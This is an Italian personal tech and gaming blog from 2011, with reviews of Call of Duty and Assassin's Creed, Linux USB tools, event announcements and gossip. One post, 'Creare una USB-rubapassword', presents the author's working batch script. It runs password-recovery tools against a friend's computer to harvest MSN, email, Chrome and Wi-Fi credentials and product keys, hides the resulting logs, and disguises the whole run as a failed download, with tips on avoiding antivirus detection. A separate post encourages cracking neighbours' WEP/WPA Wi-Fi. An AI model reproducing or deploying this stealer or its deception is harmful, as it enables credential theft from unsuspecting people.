lunedì 14 novembre 2011

Recensione Call of Duty Modern Warfare 3

Salve a tutti, quest’oggi sono qui per recensire finalmente il nuovissimo Call of Duty Modern Warfare 3, uscito l'8 Novembre 2011. Per chi di voi non lo conoscesse Call of Duty è una saga di videogiochi del genere sparatutto in prima persona. 


La storia
La storia inizia nel punto esatto in cui finisce quella di Modern Warfare 2, nella prima missione infatti, il tuo compito sarà di proteggere l’edificio nel quale un medico sta richiudendo le ferite di Soap, causate dal generale Shepard nell’ultima missione di MW2. La campagna è avvincente e ha il gameplay vario e dinamico che siamo abituati a vedere in Modern Warfare.
Multiplayer
Passiamo ora al pezzo forte dei giochi targati Callo of Duty, nel multiplayer sono state fatte numerose innovazioni, come un nuovissimo sistema dello sblocco delle armi e dei loro accessori, nel quale dovremo non solo aumentare il nostro livello, ma anche quello di ogni singola arma in modo da sbloccarle equipaggiamenti come mirini, lanciagranate, cardiorivelatori e fucili a pompa sottocanna. Per quanto riguarda le modalità di gioco, variano dal classico deathmatch al conquista e difendi. Con l’aggiunta della nuova modalità uccisione confermata nella quale dopo aver eliminato un avversario dovremo raggiungere il suo corpo per ottenere una piastrina che porterà ulteriori punti a noi e alla nostra squadra. Le mappe sono a mio parere, tutte esageratamente grandi, niente più mappe come Nuketown quindi… Anche qui il gameplay è molto vario e realistico. Il prestigio si raggiungerà al livello 80.
Operazioni speciali
Amanti della modalità zombie rallegratevi! I produttori, dopo aver visto il successo riscosso dalla modalità zombie di Black Ops, hanno ben deciso di mettere una modalità “Sopravvivenza” nella quale dovrete (da soli, a schermo condiviso o online, per un massimo di 2 giocatori) sopravvivere ad ondate di soldati, che dapprima arriveranno armati di fucili a pompa, per poi essere accompagnati da cani e elicotteri, con armi e armature sempre più forti. Nella partita saranno presenti tre punti nei quali potrete comprare armi e munizioni, esplosivi e corazze, e supporto aereo come missili predator o addirittura un supporto di 5 soldati comandati dalla CPU. Un modalità interessante dunque, che vi porterà a dover escogitare tattiche sempre più sofisticate per sopravvivere il più a lungo possibile. Anche per questa modalità saranno presenti 20 mappe, divise per difficoltà. 
Per quanto riguarda le missioni invece anche queste possono essere giocate in giocatore singolo, a schermo condiviso o online, e si potrà scegliere la difficoltà con cui affrontarle.

Per gli appassionati di Call of Duty, ve lo consiglio vivamente, imparagonabile ai precedenti.

lunedì 3 ottobre 2011

Scandalo: Vasco Rossi denuncia Nonciclopedia!

Sembra inmpossibile eppure, il celebre "cantante" una volta venuto a sapere della pagina scritta su di lui sul famosissimo sito satirico di Nonciclopedia decide bene di sporgere denuncia per diffamazione.

Per chi di voi non lo conoscesse, Nonciclopedia è un'enciclopedia online un po' particolare, che tratta ogni argomento con  ironia. In funzionamento del sito è pressochè identico a quello di Wikipedia, gli utenti si iscrivono e possono tranquillamente pubblicare pagine. Onestamente non ho avuto il tempo di leggere la pagina dedicata al caro Vasco, ma sono sicuro che come le altre, avrà avuto di certo qualche battutaccia di troppo e cose simili, ma niente di così meritevole da ottenere una denuncia!

Resta comunque il fatto che il VIP decide di sporgere denuncia al sito attraverso una lettera che viene spedita direttamente dall'avvocato alla redazione di Nonciclopedia, che risponde prontamente spiegando le origini del sito e la sua origine comica, discolpandolo certamente da tutte le accuse. L'avvocato ovviamente non si fa più sentire... Sembra che sarebbe dovuto anche avvenire un processo tra il VIP e il malcapitato 15enne autore della pagina su Vasco, che fortunamente (per ora) non è avvenuto.

Da precisare anche il fatto che già in passato molteplici celebrità avevano avuto contatti con il sito, ma in tutti i casi si era sempre provveduto a cancellare prontamente la pagina non ricevendo più lamentele dalle Celebrity interessate. Mai era capitato alla comunità di ricevere una denuncia con tanto di interrogatori agli amministratori da parte della polizia postale, costringendoli a chiudere il sito per protesta a tempo indeterminato, lasciando le migliaia di lettori a bocca asciutta.

Personalmente sono senza parole, da grande fan di Nonciclopedia mi rendo conto che tutto questo sia una gran... bha, non mi vengono parole, è semplicemente indescrivibile. Che il povero Vasco si sia avvicinato alla banca rotta, e questo sia solo un misero tentativo di raccimulare qualche soldo con una denuncia ad un 15enne? Non lo sapremo mai... Daltronde, cosa aspettarsi da un pluriarrestato "cantante"? Se volete ulteriori informazioni sull'argomento questo è il sito di Nonciclopedia.

Con la speranza che Vasco Rossi non venga a sapere di questo mio articolo... qui concludo, al prossimo articolo!

martedì 13 settembre 2011

Assassin's Creed

Assassin's creed (primo di una serie di videogame) è un videogioco marcato Ubisoft pubblicato inizialmente sulle piattaforme Playstation 3 e xbox 360, in seguito uscito anche l'adattamento per Microsoft Windows nell'aprile del 2008.

Ideazione :

 Jade Raymond (Produttore)
 Patrice Desilets (Project manager)
 Corey May (Scrittore)
 Jesper Kyd

Pubblicazione del videogioco per piattaforme Playstation 3 e xbox 360 :

 Nord America : 13 Novembre 2007
 Europa : 15 Novembre 2007
 Australia 29 Novembre 2007
 Giappone : 29 Novembre 2007

La data di pubblicazione per Microsoft Windows è invece stata :

 Nord America : 8/9 Aprile 2008
 Australia : 10 Aprile 2008
 Europa : 11 Aprile 2008
 Italia : 14 Aprile 2008


Il protagonista è l'assassino Altaïr Ibn La-Ahad ( aquila volante ), Altair dovrà affrontare : crociati,ospitalieri,templari,teutonici,saraceni.Il gioco e ambientato in Terra santa nel : 1191

 TRAMA : All'inizio della storia si impersona Desmond Miles, nel 2012 che è stato rapito dai templari... Essi cercheranno nel suo DNA per trovare un'arma, in esso c'è la risposta per far vincere la guerra ai templari, basta usare l'animus (macchina apposita per far rivivere i ricordi dell'antenato) per vedere dove Altair, l'antenato di Desmond, abbia nascosto la "mela", l'arma che puo farli vincere

Nelle memorie di Altair che vivremo attravesrso Desmond dovremmo farci carico delle uccisioni o assassini si 9 persone allo scopo di non far sapere il segreto dell'arma...

ATTENZIONE RIVELAZIONI SHOCK SE NON VOLETE ROVINARVI IL FINALE NON LEGGETE

 In realtà il capo degli assassini vuole incastrare Altair per i suoi scopi...




Assassin's creed 2 è un videogame sviluppato e pubblicato dalla Ubisoft per PlayStation 3, Xbox360, Microsoft Windows e iPhone. È stato pubblicato il 17 Novembre 2009 in Nord America, mentre in Europa il 20 Novembre 2009 e in Australia il 19 Novembre 2009 per PlayStation 3 e Xbox 360. La versione Microsoft Windows è stata messa in vendita il 5 Marzo 2010 in Europa.Il 18 Maggio 2010 è stato annunciata la Assassin's Creed II complete edition, uscita il 14 Giugno 2010, oltretutto si potranno anche acquistare l'edizione white e black

TRAMA : All'inizio del videogame Desmond dovrà entrare nell'animus. Nella quale rinasce come Ezio Auditore da Firenze.
In seguito Lucy lo aiuterà a scappare e andranno da Rebecca e Shaun, 2 amici di Lucy, e Desmond dovrà rivivere i ricordi di Ezio. Il gioco si svolgerà in numerose città italiane e sarà ambientato nella fine del 1400... Ezio in oltre a dare fondi ad una buona causa si vendica anche per la morte dei suoi famigliari uccisi per congiura e alla fine diviene un eroe.

ATTENZIONE RIVELAZIONI SHOCK SE NON VOLETE ROVINARVI IL FINALE NON LEGGETE

Alla fine li trovano ma riescono a cambiare nascondiglio indovinate dove? Continuate a leggere e lo scoprirete...




Asassin's Creed: Brotherhood è un videogioco pubblicato da Ubisoft per PlayStation 3, Xbox360 e Microsoft Windows. Il gioco è disponibile dal 16 Novembre 2010 negli Stati Uniti e dal 18 Novembre in Europa e in Australia per PlayStation 3 e Xbox360. La versione per Microsoft Windows è uscita il 17 Marzo 2011. Il gioco è stato sviluppato da Ubisoft Montreal.

TRAMA : All'inizio del gioco Desmond, Lucy, Rebecca e Shaun vanno a Monteriggioni per trovare un rifugio dall'Abstergo. Ezio risparmiando il suo peggior nemico ha firmato la sua condanna a morte. La città di Monteriggioni cade, lui viene ferito gravemente ma non muore mentre suo zio Mario si, e la mela dell'Eden (l'arma più forte mai esistita cade nelle mani del figlio dello spagnolo). Ezio viaggia fino a Roma con un cavallo ma non dura molto e gia sviene e così lo troverà Macchiavelli un suo fedele amico e lo porterà a Roma per compiere il suo destino e vendicare lo zio.

ATTENZIONE RIVELAZIONI SHOCK SE NON VOLETE ROVINARVI IL FINALE NON LEGGETE

Alla fine gli assassini: Desmond, Lucy, Rebecca e Shaun ritrovano la mela ma qualche cosa costringe Desmond ad uccidere Lucy e poi cade in coma e si sentono le voci di chi lo ha rapito.

Il prossimo capitolo della saga, Assassin's Creed Revelation si presenta un capolavoro come i suoi precedenti, in attesa della sua uscita eccovi il Trailer.




Ringrazio molto Alessando Plebani per la stesura dell'articolo e vi consiglio la sua pagina Facebook Assassin's Creed Triology

martedì 16 agosto 2011

Linux sempre con te con LiLi USB Creator

Oggi vi presenterò una carinissima applicazione per installare distribuzioni Linux su dispositivo USB. Il programma in questione è LiLi USB Creator. Io personalmente lo apprezzo molto, sia per la praticità nell' utilizzo che per l'interfaccia grafica. Il software è scaricabile gratuitamente qui.
                                           
Come installare una distribuzione Linux su dispositivo USB

Passo 1 : Bisogna selezionare la chiavetta USB desiderata

Passo 2 : Bisogna selezionare la distribuzione Linux, potete scegliere se installare una distribuzione che avete già scaricato in precedenza, una distribuzione installata su CD o scaricarla dalla lista di distribuzioni presente nel programma. Se decidete di metterne una già scaricata il programma prima di installarla ne farà una scansione antivirus. 

Passo 3 : Una volta che avete selezionato la vostra distribuzione dovete scegliere in che modalità essa verrà installata, dovete selezionare Modalità Live.

Passo 4 : Selezionate le vostre preferenze, attenti a non installare Linux su una chiavetta contenente dei dati, perchè verranno cancellati.

Passo 5 : Se avete svolto l'operazione correttamente tutti i semafori sulla destra dovrebbero essere verdi o gialli. Quando avete finito premete sul fulmine in basso e attendete.

Avviare Linux 

Per avviare il vostro Linux, riavviate il computer e appena appaiono le scritte iniziali premete ESC. Dovrebbe apparirvi un menù con la lista dei dispositivi presenti nella quale vi basterà selezionare la vostra pennetta USB.

Spero di esservi stato utile. 


Backtrack, Linux Penetration Testing Distribution

Oggi vi presenterò una delle mia ditribuzioni linux preferite, Backtrack.  

Backtrack è attualmente la migliore distribuzione linux per il penetration testing presente sul web, in essa troviamo una vastissima gamma di applicazioni preinstallate con la suite Air-crack, Gerix, Hydra e moltissimo altro... ovviamente è tutto gratis...

Quante volte vi sarà capitato di trovarvi fuori casa con il vostro pc, e senza l'ombra di una rete wifi senza protezione? Nella società di oggni, ovunque di può ricevere il segnale di almeno una wifi, e con Bactrkack a vostra disposizione potrete avere accesso ad internet ovunque vi troviate.                                                      

Come sapete le due crittografazioni più comuni sono le WEP e le WPA, per le prime Backtrack fornisce più di un software, il più famoso è Gerix, funzionante anche per le WPA. Gerix Wifi Cracker è in poche parole l'interfaccia grafica della suite di Air-crack, è molto semplice da usare.

Per i più smanettoni invece ecco a voi le guide (WEP, WPA) per fare il tutto dalla shell.

L'ultima release attuale di Backtrack è la 5, anche se vi consiglio vivamente di avere la 4 R2. La potete facilmente installare su chiave USB per averla sempre con voi, inoltre vi consiglio di non intallare Backtrack sul disco fisso del pc per il semplice motivo che non è stabile e adeguato ad essere utilizzato come OS base. Potete trovare Backtrack anche in SARDU.

SARDU, Multi boot USB Creator

Oggi vorrei presentarvi una simpaticissima applicazione che vi consente di avere sempre con voi sul vostro dispositivo USB, una lunga lista di utility che vanno da antivirus, a sistemi operativi windows e linux. Il programma in questione è SARDU.

Il software è scaricabile gratuitamente da qui. All'interno come ho già detto ci sono moltissime utility, ognuna di esse dovrà però essere scaricata separatamente dal software, e inserita nell'apposita cartella di SARDU, il quale provvederà automaticamente a riconoscerla e aggiungerla alla lista. Ovviamente potrete selezionare quali installare e quali no...

Le utility sono divise in:

Antivirus, ci consentono facilmente di avviare un'immagine di uno dei CD di antivirus che abbiamo in lista, con i quali possiamo fare una scansione senza dover accedere al sistema operativo. Nel software ne sono presenti 15. Non li elenco ma se volete potete trovarli con tanto di descrizione sul sito ufficiale di SARDU.

Utility, sono le più svariate, da Partition Wizard a Ophcrack, ce ne sono in tutto 13.

Linux Live, una raccolta delle distribuzioni linux più famose, una novità è che è presente anche Bactrack nella lista, un'aggiunta molto pratica, che ci consente di aver a nostra disposizione in ogni momento la miglior distribuzione di penetration testing attualmente presente sulla rete.

Windows, una raccolta di veri e propri sistemi operativi windows portatili, di recovery disk e di installer.

Ve lo consiglio, anche se per renderlo davvero utile credo dobbiate disporre di una pennetta USB di almeno 4Gb, o sarete costretti a portare con voi solo poche cose.

Spero di esservi stato utile.

sabato 30 luglio 2011

Daniele Doesn't Matter, un mito del web

Per chi non lo conoscesse Daniele Doesn't Matter è uno dei più famosi youtubers presenti sulla rete.

Ha spopolato in internet con i suoi video comici, ciascuno dei quali tratta con ironia un differente argomento, rappresentandolo nella vita reale con divertenti rappresentazioni. Nei suoi video inserisce anche, attraverso giochi di parole, o come esempi, alcuni dei numerosissimi filmati trash presenti su you tube, che si alternano alla trama vera e propria della storia.

Con il tempo Daniele ha inserito nei suoi video pesonaggi che ravvivano la trama della storia come: TU che rappresenta l'utente medio di internet, TU DONNA, come il precedente ma in versione femminile, e altri personaggi come TU NONNO, Il Dott.Gianfranco Franco Franchini, e ovviamente Freddy. (Qui sotto)

All'inizio di ogni video c'è, dopo il saluto di Daniele, la sigla dei suoi video, anch'essa fatta molto bene. In ogni puntata Daniele inserisce una domanda sua o di un suo fan, per ricevere la risposta dagli altri utenti e inserirla nel video successivo (parliamo di domande del genere "Perchè i bambini fanno oh?"). Il video finisce con i suoi saluti e le foto dei fans.

Personalmente io ho visto il suo primo video circa un anno fa, non ne ho ancora perso nemmeno uno. Questo, anche grazie al fatto che, come pochissimi youtubers fanno, Daniele pubblica i suoi video settimanalmente ogni venerdì.

Questi sono i canali you tube di Daniele:
1° Canale Doesn't Matter Podcast
2° Canale Doesn't Matter Vlog
3° Canale Doesn't Matter Mobile

Non vi pubblico un video perchè non avrei idea di quale mettere quindi andate nel podcast e fatevi guidare dal destino...

Ipad 2 vs Galaxy Tab vs Xoom: Sfida crash test


iPad 2 vs. Galaxy Tab vs. Xoom: il piacere della sfida


Bisogna ammetterlo: si prova una strano brivido di piacere ad osservere esplosioni, demolizioni e simili, soprattutto quando sapete che è fatto solo per divertimento. Ma non è così divertente quando si fa cadere il vostro tablet da 600€. Sopravviverà o avrete perso tutti i vostri soldi e vi ritroverete senza un tablet fino alla prossima riparazione o sostituzione?


Già nel mese di giugno SquareTrade (una delle diverse società che vende assicurazioni per i dispositivi mobile, ragion per cui ha tutto l’interesse nel capire che tipo rischi corre quando offre assicurazioni su questi dispositivi) aveva girato due video crash test che mostravano come un iPad 2, con e senza Smart Cover, e un BlackBerry PlayBook se la cavassero in caso di caduta da altezza diverse. Se l’iPad 2 con Smart Cover riusciva a resistere abbastanza bene, altrettanto non si può dire del tablet Apple senza custodia protettiva e del PlayBook, che uscivano in condizioni davvero pessime.

iPad 2 vs. Galaxy Tab vs. Xoom: SquareTrade dà il via alla sfida (in video)

Ora SquareTrade ha fatto nuovi crash test da alcune altezza diverse per verificare la solidità dei due principali tablet Android, il Samsung Galaxy Tab 10.1 e il Motorola Mobile Xoom, e ha riprovato i test anche un iPad 2 senza Smart Cover. Potete vedere voi stessi i risultati nel video qui sotto.



iPad 2 vs. Galaxy Tab vs. Xoom: risultati del crash test

Lo schermo dell’iPad 2 senza una Smart Cover si infrange, anche se il tablet continua a funzionare. Ricordiamo invece che un iPad 2 protetto da una Smart Cover sopravvive intatto e l’iPad continua a funzionare in ogni caso.

Il Motorola Xoom riporta un danno ancora peggiore dell’iPad 2 al crash test, probabilmente a causa del suo peso maggiore.

Ma il Galaxy Tab 10.1 subisce un danno minimo alla caduta. Anche se il suo peso, lo spessore e le dimensioni sono più o meno simili a quelle dell’iPad, la sua struttura reagisce meglio alla caduta.

Cosa significa tutto ciò? Innanizitutto che anche voi siete affascinati dai crash test se siete arrivati fin qui. Due, il Galaxy Tab 10.1 (o un iPad 2 dotato di Smart Cover) è la scelta migliore per gli acquirenti di tablet dalla dita di burro.
iPad 2 vs. Galaxy Tab vs. Xoom: vince il tablet Samsung

lunedì 25 luglio 2011

Mother: A Computer Hacking Simulation

Se siete appassionati di hacking, ma non avete intenzione di infrangere in alcun modo la legge entrando realmente in un computer altrui, allora vi consiglio questo bellissimo gioco, che simula un nuovo sistema operativo, Mother.

All'interno del gioco dovrete svolgere le più svariate missioni di hacking per conto dell'associazione di cui fate parte, l'Underground, un gruppo di hacker che lottano per ottenere la libertà e la sicurezza della rete. Vi ritroverete a dover cancellare dati dagli archivi dell'Intrapol, una specie di FBI informatica, ad abbattere server, e molto altro ancora.

La piattaforma è molto coinvolgente, all'interno del sistema operativo del gioco avrete a disposizione alcuni software per l'utilizzo più svariato, per ascoltare la vostra musica caricandola nel gioco, per prendere appunti, per craccare passwords, per fare upload di dati nei server ecc... Tutto il gioco, (o quasi) è giocabile in modalità grafica, ma per i più smanettoni tra di voi, sarà anche possibile giocarlo utilizzando la console del sistema operativo.

Sono presenti due aggiornamenti del gioco, e alcune patch contenenti nuovi software, nuove missioni ecc... tutto questo lo potete trovare sul sito ufficiale di Mother nell'area download.

Buon divertimento!

sabato 23 luglio 2011

Tom Clancy's Ghost Recon: Future Soldier

Il nuovo titolo, ispirato ad un'opera di Tom Clancy, realizzato dalla Ubisoft dopo una presentazione con tanto
di trailer e gameplay, ha subito il destino di essere bloccato e nascosto dai realizzatori con la semplice scusa "Ci stiamo lavorando".

Il ritorno in pista del gioco però ha riscosso un gran successo, tanto da potersi permettere di dimenticare lo sfortunato debutto del gioco.

Per la prima volta il nuovo gioco marcato Ubisoft è stato giocato in live sul megaschermo del Los Angeles Theathre, rivelando una demo più che corposa che vedeva il nostro gruppo di soldati impegnati in una missione di recupero di un ostaggio ambientata in Nigeria. Non appena arrivati al primo manipolo di nemici, si è potuto apprezzare le notevoli qualità dell'interfaccia di gioco, che unisce indicatori olografici che ricordano quelli visti in Dead Space con informazioni sugli obiettivi della missione che diventano parte integrante dello scenario. L'impatto che si ha sul gioco è davvero notevole, gli sviluppatori nell'intento di creare un futurisco e realistico visore tattico hanno svolto un ottimo lavoro.

La Ubisoft ha deciso di reinserire lo stealth camouflage stile Predator, ma ridimensionandole l'importanza, infatti, l'importanza del gameplay è incentrata sul lavoro di squadra, che permette di elaborare tattiche sempre più sofisticate. L'iniziale manciata di nemici è stata infatti neutralizzata con dei precisi colpi sparati all'unisono dai quattro membri del team Ghost, un lavoro pulito e silenzioso preceduto dall'immancabile assegnazione degli obiettivi: la linea di fuoco di ognuno dei soldati del gruppo veniva in questo ambito segnalata da un fascio di luce azzurra, in modo da far capire immediatamente quali nemici sarebbero stati abbattuti dai propri compagni. Il tempo di eseguire un'uccisione stealth corpo a corpo e di avvicinarsi ad un'abitazione ed ecco la sorpresa: le luci del teatro si sono accese su tre postazioni aggiuntive a quella principale, dimostrando come la demo venisse giocata da quattro utenti in cooperativa.

Detto fatto ed il megaschermo si è ripartito in altrettanti quadranti che mostravano la visuale di ognuno degli addetti Ubisoft impegnati nella dimostrazione, i quali si sono lanciati in una spettacolare breccia dell'edificio entrando da due ingressi diversi. Lecito dunque pensare che la modalità multiplayer sarà un notevole valore aggiunto della produzione, come ha dimostrato il successivo ed ultimo spezzone di gameplay, con l'azione che nel frattempo si era spostata ad una raffineria occupata dai terroristi. Dopo una serie di frenetiche sparatorie che hanno messo in mostra, tra le altre cose, un sistema di coperture apparentemente molto valido, i Ghost hanno raggiunto il container dove era rinchiuso l'ostaggio da portare in salvo.

Quanto mostrato dalla demo ha messo alla luce scenari di ampio respiro, ben realizzati per quel che concerne le strutture poligonali ed infarciti di proiettili, esplosioni ed effetti visivi vari che non sembravano inficiare un frame rate sempre stabile. Alla bontà dei modelli dei soldati e delle loro animazioni ci sentiamo inoltre di aggiungere il gustoso taglio registico della videocamera che segue l'azione, che non lesina in movimenti sincopati che conferiscono efficacemente l'idea di ritrovarsi su un campo di battaglia.

Il gioco uscirà nel marzo 2012.

Aggiornamento 25/08/2011

Ho trovato delle immagini riguardanti la modifica delle armi, sensazionali! Dimenticatevi Call Of Duty, ora sarà possibile creare l'arma (più di una) quasi da zero, e modificarvela in base alle vostre preferenze e alle esigenze della missione. Ecco a voi le prime immagini del web...



Ed ecco a voi un video che vi mostra tutte le caratteristiche della modifica delle armi...




E finalmente in anteprima un video tratto dal multiplayer, con la spiegazione di tutte le classi.


       
Aggiornamento 16/03/2012

La data di rilascio del gioco è stata posticipata al 25 di Maggio.

venerdì 15 luglio 2011

5° Edizione della "Cracca Al Tesoro"


Il gioco a squadre chiamerà a raccolta hacker da tutta Italia per una sfida all'ultimo byte.


Cracca Al Tesoro è una versione moderna e tecnologica della ben nota Caccia al Tesoro e richiede ai giocatori che compongono le diverse squadre di superare una serie di sfide per arrivare al premio finale.
Gli strumenti per superare le sfide sono semplici: un computer portatile, una connessione Internet wireless e molta, molta intelligenza, tenacia, pazienza e competenza tecnologica.

Si tratta infatti di "craccare", cioè di individuare e sfruttare le falle di sicurezza volutamente inserite dagli organizzatori nei server collegati ad una serie di "access point" strategicamente disposti per accedere alle indicazioni nascoste che porteranno alla tappa successiva.

Di tappa in tappa, Superando barriere sempre più complesse e articolate e individuando, gli "access point" che compongono il percorso, le squadre di "ethical hackers" giungeranno, alla fine del percorso, sino ad individuare la sfida finale, il tesoro, che dà titolo alla gara.
Così gli sfidanti dovranno dare prova di intelligenza intuitiva per individuare gli "access point", capacità tecniche per violarne le protezioni, senso di squadra per organizzare un lavoro di équipe.

E naturalmente senso goliardico per cogliere lo spirito di divertimento dell'iniziativa, serissima dal punto di vista dei contenuti, delle "regole di ingaggio" delle difficoltà tecniche, ma allegra e giovanile nel suo modo di manifestarsi e di svolgersi.

Cracca Al Tesoro è infatti una manifestazione nata per avvicinare il grande pubblico dei non addetti ai lavori alla cultura della sicurezza ed all'utilizzo corretto delle moderne tecnologie che possono portare, se non gestite correttamente, a problemi come furto di identità e sottrazione di informazioni.

Il tema è di stretta attualità e Cracca Al Tesoro ha ricevuto il supporto ed il patrocinio di prestigiose organizzazioni oltre che della Regione Umbria e del Comune di Orvieto.

 In palio per i vincitori apparecchiature e gadget tecnologici, magliette e la soddisfazione di avere sfidato gli esperti più qualificati che hanno creato le "barriere" da superare.

Dietro a questo "hacking game" c'è una Squadra di Super esperti in sicurezza tecnologica che anche quest'anno hanno reso possibile CAT: @Mediaservice con le competenze di sicurezza, Alba con "uomini pronti a tutto", Studio Giardini con la gestione organizzativa e SonicWALL con il suo wifi sicuro, costituiranno una vera e propria "situation-room", un centro di controllo dove non solo saranno definite le barriere tecnologiche da "hackerare", ma verranno anche tenuti sotto controllo i movimenti di tutte le squadre.

Tutto si svolge infatti nel più rigoroso rispetto delle regole della privacy e delle tecnologie del quartiere, senza invasione delle strutture esistenti, né pericoli tecnologici di alcun genere per i cittadini e le strutture che ospitano gli access point.

La giornata si aprirà al mattino con un convegno sul tema della sicurezza informatica con importanti ospiti per proseguire nel primo pomeriggio con il gioco vero e proprio e con la premiazione e relativa festa a fine giornata.

Programma:
 10.00 - Registrazione dei partecipanti HelpDesk e Volontari CAT (CAT's Angels
 10.30 - Saluti di benvenuto e presentazione dell'edizione CAT 2011@Security Summit da parte del Comitato Organizzatore CAT;
 10:45 - Intervento dell'assessore all'informatica del Comune di Orvieto prof. Claudio Margottini
 11.15 - Cosa è CAT, il wardriving, il problema del wifi (Paolo/Alessio)
 11.45 - Tavola rotonda: Anonymous e gli attacchi ai siti istituzionali con con Raoul Chiesa (UNICRI), Alessio Pennasilico (CLUSIT, AIPSI), Marina Latini (FSUG Italia), Ing. Yvette Agostini (security researcher), Cristiano Cafferata (SonicWall), Emanuele Gentili (BackTrack Linux International) Paolo Giardini (Direttore OPSI)
 12.45 - Discussione con il pubblico
 13.30 - Pranzo
 14.30 - Briefing e via al gioco
 19.00 - Termine del gioco, verifica dei punteggi
 19.30 - Proclamazione di vincitori, premiazione, festa finale a base di musica (DJ set Koba), vino e porchetta

Per registrarsi gratuitamente e rimanere informati, visitare il sito wardriving.

martedì 5 luglio 2011

Creare una USB-rubapassword

Ciao a tutti!

Oggi vi presenterò un simpatico programma fatto da me per rubare password dai computer dei vostri amici.

Il procedimento è semplice, vi basterà decomprimere l'archivio in una penna usb vuota e far partire il programma. Ora vi spiego in dettaglio.
Il programma di basa sulla finzione del download del programma stesso dal sito Softonic. A voi basterà dire che avete trovato un programma per usb per rubare password, il che è vero, e far credere alla vittima che il file .bat che utilizzeremo sia il downloader del programma. Durante il finto download il programma ruba tutte le password possibili, quando ha finito, il finto download dirà di aver riscontrato un errore, e ciò giustificherà l'assenza del programma scaricato, a questo punto direte che il computer non è compatibile o qualche scusa del genere. Ma ora vediamo la parte tecnica:

Questo è il testo del file .bat:

REM Collegamento a Softonic.com ...


@mspass.exe /sverhtml mspass.html
@echo Downloader.exe /sverhtml Downloader.html
@ProduKey.exe /shtml ProduKey.html
@mailpv.exe /shtml mailpv.html
@ChromePass.exe /shtml ChromePass.html

REM Inizializzazione download in corso ...

@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Data: %DATE% - Ora: %TIME% >> log.txt


@pause


REM Download in corso ...

@rar.exe a logs.rar *.html *txt log.txt > nul
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h iepv.cfg
@attrib +h logs.rar


REM Download fallito (Errore 39004256828e)


@pause





Semplice no? Vediamolo in dettaglio...

Come avete visto nel mio precedente articolo, il comando <REM> serve per inserire dei commenti, il questo modo nella shell sarà visualizzata la scritta scritta immediatamente dopo.

La @ indica che sulla shell non deve apparire niente al riguardo della stringa di codice che la segue.

Solo nel caso della seconda scritta con la @, essendo seguita da <echo>, che anche se non ho capito ancora bene come ma fa apparire ugualmente la scritta ma senza chiedere i permessi di amministratore in caso stiate usando Windows 7. Dato che quella scritta deve quindi apparire, ho deciso di rinominarla in downloader.exe, cosi sulla shell apparirà scritto downloader.exe e non creerà sospetti. In realtà quel programma è quello per le password delle reti wifi.

Il secondo blocco di codici inizianti con la @ servono per creare un file .txt con tutte le informazioni sul sistema.

Il comando <pause> serve per chiedere al'utente se si desidera continuare attraverso la pressione di un pulsante qualsiasi. Il che serve solo per rendere il programma realistico.

L'ultimo blocco di codici serve per copiare tutti i logs dei programmi per rubare la password in un archivio, a cancellare i file rimasti fuori dall'archivio e a nasconderlo.

Per ritrovare i vostri logs vi basterà aprire il percorso file e cercare il file logs.rar nella vostra chiavetta usb, è tutto là dentro.

Per rendere la chiave operativa svuotatela, copiateci l'archivio che avete scaricato ed estraetelo.
Ora mettete l'archivio in una cartella sicura o sarà cancellato automaticamente, vi consiglio di tenerne una copia nella chiave usb. Fate partire il file .bat "Download HackPass". HackPass è il finto nome del programma che sarente andati a scaricare.

Ecco la lista dei software inseriti nel programma:

mspass: serve per le password di msn
wifikeyview: serve per le password delle reti wifi
ProduKey: serve per trovare tutti i product key dei software installati nel pc della vittima
mailpv: serve per le password della varie mail
ChromePass: serve per le password memorizzate in Google Chrome

Non ho inserito quello di Firefox perchè è riconosciuto dagli antivirus, e vi farebbe scoprire, mentre per Opera non è stato ancora realizzato.
Ho ache aggiunto una miniguida nel archivio da scaricare, il file si chiama "NON ARPIRE!".

Vi ricordo che ho scritto questo articolo a scopo informativo, e non mi ritengo responsabile delle vostre azioni.

Spero di esservi stato utile che l'articolo vi sia piaciuto.

Download USB-rubapassword

Facebook, la rimonta vs Google

Facebook risponde a Google e si prepara a lanciare un nuovo servizio di chat video in collaborazione con la Microsoft.



Facebook, starebbe per lanciare un nuovo servizio di chat video in collaborazione con Skype, recentemente acquistato dalla Microsoft. Si tratterebbe della nuova funzione annunciata per il 6 luglio da Mark Zuckerberg: ma dato che nel frattempo vi è stato il positivo esordio, in beta testing, di Google+, la mossa del social network in blu sembra la risposta alla nuova iniziativa di Mountain View.
Il nuovo servizio di chat video funzionerà via browser e offrirà quella che viene descritta come una "profonda integrazione" tra Facebook e Skype e quindi un triangolo inatteso contrapposto a Google, vista la recente acquisizione del servizio VoIP da parte di Microsoft.

La sfida si giocherà dunque, oltre che in generale sulla capacità di fare "rete" del nuovo social network targato Google, sui servizi di chat video, per cui Mountain View ha già offerto una versione con conversazioni di gruppi, servizio che invece per il momento Skype limita agli utenti paganti.

Inoltre un nuovo sito, creato dagli uomini di Facebook e chiamato Circle Hack, permette tramite una funzione di drag-and-drop, una distribuzione dei propri amici Facebook simile a quella pensata per i circoli di Google+.

A supporto di quelle che sono ancora indiscrezioni, Facebook ha confermato un evento-lancio per la prossima settimana.

lunedì 4 luglio 2011

Jubbol, un nuovo modo di comunicare

Ciao a tutti!


Oggi vi parlerò di Jubbol, un nuovissimo social network nato per semplificare ed unire tutto ciò che prima potevate fare solo tramite più programmi.

Jubbol, nasce da un idea di Alessandro Mazzola, è un social network come Facebook o Twitter, non è purtroppo ancora molto popolare ma possiede numerose funzionalità che i due citati non hanno. La specialità di Jubbol è quella di poter fare online, gratuitamente ovviamente, videochiamate e conferenze, cosa che prima era possibile gratuitamente solo su Skype o siti dedicati. Non serve dire che non è necessario nessun download per questo. Sul sito inoltre sono presenti tutte le possibilità di un comune social network quali creare un profilo, aggiungere foto e video, condividere messaggi, una bacheca pubblica, giochi e molto altro...

Vi consiglio di provarlo, è ancora in fase di sviluppo quindi siate benevoli nei confronti dei piccoli bug presenti, che comunque non implicano nessun ostacolo nell'utilizzo del sito...
Il nickname di Alessando è Alex92, mentre se volete aggingere anche me io sono Nico Rizza.

Per visitare Jubbol cliccate qui.

Breve video di presentazione:


Spero l'articolo vi sia piaciuto, ciao!

domenica 3 luglio 2011

Stuxnet, il virus più pericoloso della rete

Ciao a tutti!

Oggi parleremo del virus più pericoloso della rete.

